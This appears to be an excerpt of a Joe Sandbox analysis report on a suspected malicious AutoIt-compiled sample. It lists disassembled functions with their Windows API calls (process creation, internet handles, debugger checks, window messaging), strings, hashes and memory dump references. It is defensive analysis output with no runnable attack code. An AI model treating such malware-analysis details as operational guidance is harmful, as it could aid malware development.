Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: CrackInternet_wcslen
String ID: |
API String ID: 596671847-2343686810
Opcode ID: 8dc1b1c69ce2af2d77bf59b796b38f88908ad9efa361b3b3ab525f61b27950a0
Instruction ID: 20de1884158e0cb95b0cdf2d8ee3d4ff1b41bc96ce37ac12595cdfae6ab8a7f9
Opcode Fuzzy Hash: 8dc1b1c69ce2af2d77bf59b796b38f88908ad9efa361b3b3ab525f61b27950a0
Instruction Fuzzy Hash: 91311A71D0020AABDF15EFA4CC89AEFBFB9FF44300F000119F815A6165DB31AA56DB60

Function 005A356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 005A3621
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 005A365C

Strings

static, xrefs: 005A35BC

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 99cf8721bbbf0af5fb9d03e06293ab2ddf1a5e7f8a35beab55d70fb5d3a8ec86
Instruction ID: ec25a2110fa329503b0883681e4de8e28bc733ad666cfcda874b9030258fb835
Opcode Fuzzy Hash: 99cf8721bbbf0af5fb9d03e06293ab2ddf1a5e7f8a35beab55d70fb5d3a8ec86
Instruction Fuzzy Hash: 2231AD71500204AEEB109F68DC84EFF7BA9FF89724F008619F8A597280DA31AD81D760

Function 005A4537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 005A461F
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 005A4634

Strings

', xrefs: 005A458E

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: b4c3178dca700e86665d0cc00e29ceb6bbc411a83cd23056dbacc146c5d51745
Instruction ID: cf6a83b4df17a8db4cdfa2242298cf86384d68b0ab00f160ebbea7432901c601
Opcode Fuzzy Hash: b4c3178dca700e86665d0cc00e29ceb6bbc411a83cd23056dbacc146c5d51745
Instruction Fuzzy Hash: 11310774A0120A9FDB14CFA9C990BEE7BB5FF8A300F14446AE905AB351D7B0A941DF90

Function 005A31EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 005A327C
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 005A3287

Strings

Combobox, xrefs: 005A3249

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 15a5f86fe614abad92210b838aafd138aa582b47e32194301fab63345ff049fc
Instruction ID: 2066e20eb525f80fa94064adbde64d5f5ed8f3dafd71121173266e5b07c47926
Opcode Fuzzy Hash: 15a5f86fe614abad92210b838aafd138aa582b47e32194301fab63345ff049fc
Instruction Fuzzy Hash: CF11D0752002086FEF219E94DC84FBF3F6AFF9A3A8F100125F9189B290D6319D5197A0

Function 005A3710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 0051600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0051604C
Part of subcall function 0051600E: GetStockObject.GDI32(00000011), ref: 00516060
Part of subcall function 0051600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0051606A

GetWindowRect.USER32(00000000,?), ref: 005A377A
GetSysColor.USER32(00000012), ref: 005A3794

Strings

static, xrefs: 005A3757

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 43475b6a7eb57b70b17046f5870abbcdfba026bbd09eba550e85b5845f200ab2
Instruction ID: 134114b73b3ec6008c4fdbef1b1a556f0835499b4b2661c04ee85addd2195076
Opcode Fuzzy Hash: 43475b6a7eb57b70b17046f5870abbcdfba026bbd09eba550e85b5845f200ab2
Instruction Fuzzy Hash: 7B1129B261020AAFDB00DFA8CC45EFE7BF8FB09354F004914F955E2250E735E9559B60

Function 0058CD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0058CD7D
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0058CDA6

Strings

<local>, xrefs: 0058CD66

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: cf2ae006d965c32106c1efc617839c36901c7fc09f0c90bbf92d7c5d563d3e4c
Instruction ID: fb1ba8f2978b495ded9addbb0a05f2c7d65b8cdca9bcddf79a4e286ef4275730
Opcode Fuzzy Hash: cf2ae006d965c32106c1efc617839c36901c7fc09f0c90bbf92d7c5d563d3e4c
Instruction Fuzzy Hash: A811C671206671BAD7347B668C45EE7BEACFF127A4F00462AB909A3180D7709845D7F0

Function 005A3429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 005A34AB
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 005A34BA

Strings

edit, xrefs: 005A348F

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 32e96a35f1f56fee2827c0d10b76a75478074af331fc01c2f331f47d7758c70d
Instruction ID: 9d9a95a7db6a4abb988c022aa4904b02f30f53cebd6b163eaa9ec8997abdc26b
Opcode Fuzzy Hash: 32e96a35f1f56fee2827c0d10b76a75478074af331fc01c2f331f47d7758c70d
Instruction Fuzzy Hash: 52116D71500208AFEF118E64DC48AAF3F6AFB5A378F504724FA61971D0C771DC959B60

Function 00576C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00519CB3: _wcslen.LIBCMT ref: 00519CBD

CharUpperBuffW.USER32(?,?,?), ref: 00576CB6
_wcslen.LIBCMT ref: 00576CC2

Strings

STOP, xrefs: 00576CBC, 00576CC1

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: STOP
API String ID: 1256254125-2411985666
Opcode ID: 48ef831d5bccab33e5c52a4888385ecd87bd05b936b692faa66cfa2d71c84213
Instruction ID: 3d49b2ca4b2bfd66e2ba967bda0ef6c6f227092774e8f1505fe71e82b8efa2d0
Opcode Fuzzy Hash: 48ef831d5bccab33e5c52a4888385ecd87bd05b936b692faa66cfa2d71c84213
Instruction Fuzzy Hash: C30104326109278ACB219FBDEC849FF3FA8FAA1710B504924E85697190EB31DD40D650

Function 00571BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00519CB3: _wcslen.LIBCMT ref: 00519CBD

Part of subcall function 00573CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00573CCA

SendMessageW.USER32(?,00000180,00000000,?), ref: 00571C46

Strings

ComboBox, xrefs: 00571BE5
ListBox, xrefs: 00571C10

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: efe651c9493d0f528e7c4a7d4f627ef353659f84160671756b816cbee4653579
Instruction ID: 1ed53540a4fb225e058c0ca27bc0fbcb6ae22f75b40d3c3dadd142d70f95ccc8
Opcode Fuzzy Hash: efe651c9493d0f528e7c4a7d4f627ef353659f84160671756b816cbee4653579
Instruction Fuzzy Hash: 1401FC7164010566DB15E7D4D95A9FF7FACBF51340F200016A80A672C1EA209E08A6B5

Function 00571C5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00519CB3: _wcslen.LIBCMT ref: 00519CBD

Part of subcall function 00573CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00573CCA

SendMessageW.USER32(?,00000182,?,00000000), ref: 00571CC8

Strings

ComboBox, xrefs: 00571C69
ListBox, xrefs: 00571C94

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 5236eee65be101673e819480d9aa51cae9b5e414ae6b3e37adac3c6d15ee0cc8
Instruction ID: 8e6eb290ae1d6c6b4aab50148884e3fb06073902ca1ef74948d86ff6d13b0da8
Opcode Fuzzy Hash: 5236eee65be101673e819480d9aa51cae9b5e414ae6b3e37adac3c6d15ee0cc8
Instruction Fuzzy Hash: CC012B7164051567DB15EBD8DA16AFE7FACBF51380F104016B84677281EA208F08E2B5

Function 0052A4D6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0052A529

Part of subcall function 00519CB3: _wcslen.LIBCMT ref: 00519CBD

Strings

,%^, xrefs: 0052A509
3yV, xrefs: 0052A545, 0052A54D, 0052A552

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Init_thread_footer_wcslen
String ID: ,%^$3yV
API String ID: 2551934079-817577063
Opcode ID: 3d492e377663612434aeece31e17e115a4dd26e799b10a603d7cd03b3f516d98
Instruction ID: 7c970d733234b0c6971b9745d9ffd2b6b1bc791d4476596c126bdaaeb97af815
Opcode Fuzzy Hash: 3d492e377663612434aeece31e17e115a4dd26e799b10a603d7cd03b3f516d98
Instruction Fuzzy Hash: 6401F73270066197CE08F768E86FA9E7F68BF86710F401425F9025B1C2DE509D458AD7

Function 005A8172 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,005E3018,005E305C), ref: 005A81BF
CloseHandle.KERNEL32 ref: 005A81D1

Strings

\0^, xrefs: 005A818A

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: \0^
API String ID: 3712363035-3379709126
Opcode ID: 32db07969f3fce4702b68c3c4357e8697df40c1f1b821e513b0bd5300fc3f239
Instruction ID: 199575348d26d12ddfc890ce9e6295e2c54b067e2b0307b05e0c5fef0570b743
Opcode Fuzzy Hash: 32db07969f3fce4702b68c3c4357e8697df40c1f1b821e513b0bd5300fc3f239
Instruction Fuzzy Hash: AAF089B1640340BEE7246761AC4DFB73E9CEB15750F000461FB48DB1A1D6758E14A3F4

Function 0059747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00597493
_wcslen.LIBCMT ref: 005974B9

Strings

3, 3, 16, 1, xrefs: 00597483

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: _wcslen
String ID: 3, 3, 16, 1
API String ID: 176396367-3042988571
Opcode ID: b97c82e97b9f76108d7faa4ffa72d9c8ab74e129d18355eba94377ff6c9fba8e
Instruction ID: 0dbe8ab5f30028e2020a1f2af57ed84f5bd2056c98449352165aaefa24bcd8b5
Opcode Fuzzy Hash: b97c82e97b9f76108d7faa4ffa72d9c8ab74e129d18355eba94377ff6c9fba8e
Instruction Fuzzy Hash: 5FE02B03225321109B3112799CC5B7F5F8DFFCD760B14182BF989C2267EAA49D9193A0

Function 00570B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00570B23

Strings

AutoIt, xrefs: 00570B17
Error allocating memory., xrefs: 00570B1C

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Message
String ID: AutoIt$Error allocating memory.
API String ID: 2030045667-4017498283
Opcode ID: 98abebc8b2982cb242bf095458a39acc3f204d975030be5e7b8d515a1a203ba3
Instruction ID: 7e4c69ad8a3154ecb3eab911f476bee69323bb0faac76fd07e8a519cd20152dc
Opcode Fuzzy Hash: 98abebc8b2982cb242bf095458a39acc3f204d975030be5e7b8d515a1a203ba3
Instruction Fuzzy Hash: 8AE0D8322443192AD31437547C07F8D7FC8FF06B20F10042BF758555C38EE1689056A9

Function 00530D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 0052F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00530D71,?,?,?,0051100A), ref: 0052F7CE

IsDebuggerPresent.KERNEL32(?,?,?,0051100A), ref: 00530D75
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0051100A), ref: 00530D84

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00530D7F

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 55579361-631824599
Opcode ID: aea7f27dbaea130a961ef3b5b8875058a0ec245fa07bdaa42d00e76bec545277
Instruction ID: 928c34918856d7bb29dd197693750a8d2d268d4c437d567f50edcac5761334f2
Opcode Fuzzy Hash: aea7f27dbaea130a961ef3b5b8875058a0ec245fa07bdaa42d00e76bec545277
Instruction Fuzzy Hash: A8E06D742007518BD7609FB8E41834A7FE4BF15744F004D2DE4C2C6691DBB0E4889B91

Function 0052E398 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0052E3D5

Strings

0%^, xrefs: 0052E3B5
8%^, xrefs: 0052E3CA

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Init_thread_footer
String ID: 0%^$8%^
API String ID: 1385522511-2219163478
Opcode ID: 9d555d80d306128dcd2a2438f01b95a601c879dab61278852ec3b23f3fed72d9
Instruction ID: 109e54cbb7a2779ec71da4751c73cd58f25d60cdef7062a304f4a2b57a14564b
Opcode Fuzzy Hash: 9d555d80d306128dcd2a2438f01b95a601c879dab61278852ec3b23f3fed72d9
Instruction Fuzzy Hash: E9E02631400BB4CBC60CD718FAAAA8C3B99BF66321F1019AAE0828F1DDDBB038419654

Function 0056D21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 0056D220

Strings

X64, xrefs: 0056D2A8
%.3d, xrefs: 0056D22B

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: LocalTime
String ID: %.3d$X64
API String ID: 481472006-1077770165
Opcode ID: b8409e17d4200147f0b9e367c3f296fab4efbdfc5dee24edf01ed9c74ccb4cf2
Instruction ID: 729f93c779faf7c5fefaa4e5baeb76e7960134e890187afc99c36b062005929c
Opcode Fuzzy Hash: b8409e17d4200147f0b9e367c3f296fab4efbdfc5dee24edf01ed9c74ccb4cf2
Instruction Fuzzy Hash: 08D012B9D08119EACB9096D0DC599B9BF7CBF19301F508C63F80693040E728C5086771

Function 005A2356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 005A236C
PostMessageW.USER32(00000000), ref: 005A2373

Part of subcall function 0057E97B: Sleep.KERNEL32 ref: 0057E9F3

Strings

Shell_TrayWnd, xrefs: 005A2365

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 7b2092d33540409cbf0eaf3ec833ed144daefd482c603b64476492f20de3fcf9
Instruction ID: ec4612f7faff35dbf9ca8e59b975b5bf59650b54b771ba011fdf326b28704b8e
Opcode Fuzzy Hash: 7b2092d33540409cbf0eaf3ec833ed144daefd482c603b64476492f20de3fcf9
Instruction Fuzzy Hash: 6DD0C9327813147AE674A774AC0FFC67E14AB6AB10F0049167755AA1D0C9A0A8059A54

Function 005A2322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 005A232C
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 005A233F

Part of subcall function 0057E97B: Sleep.KERNEL32 ref: 0057E9F3

Strings

Shell_TrayWnd, xrefs: 005A2325

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
